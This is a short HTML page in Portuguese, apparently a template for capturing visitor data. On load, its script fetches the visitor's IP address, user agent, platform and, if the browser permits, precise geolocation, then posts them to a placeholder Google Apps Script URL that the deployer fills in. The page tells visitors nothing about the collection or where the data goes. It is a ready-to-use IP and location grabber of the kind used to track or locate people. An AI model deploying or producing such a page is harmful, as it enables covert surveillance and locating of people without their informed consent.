<!DOCTYPE html>
<html>
<head>
  <title>Coleta de Dados</title>
</head>
<body>
  <h2>Testando Captura de Dados</h2>
  <p id="status">Coletando...</p>

  <script>
    const scriptURL = "COLE_AQUI_A_URL_DO_SEU_SCRIPT"; // <-- Altere isso com a URL do seu Google Apps Script

    function enviarDados(info) {
      fetch(scriptURL, {
        method: 'POST',
        body: JSON.stringify(info),
        headers: { 'Content-Type': 'application/json' }
      }).then(() => {
        document.getElementById("status").innerText = "Dados enviados!";
      }).catch(err => {
        document.getElementById("status").innerText = "Erro ao enviar.";
      });
    }

    function coletarDados() {
      fetch('https://ipapi.co/json/')
        .then(res => res.json())
        .then(ipdata => {
          const info = {
            ip: ipdata.ip,
            browser: navigator.userAgent,
            os: navigator.platform,
            lat: null,
            lon: null
          };

          if (navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(
              pos => {
                info.lat = pos.coords.latitude;
                info.lon = pos.coords.longitude;
                enviarDados(info);
              },
              err => {
                enviarDados(info); // Envia sem localização se usuário negar
              }
            );
          } else {
            enviarDados(info);
          }
        });
    }

    coletarDados();
  </script>
</body>
</html>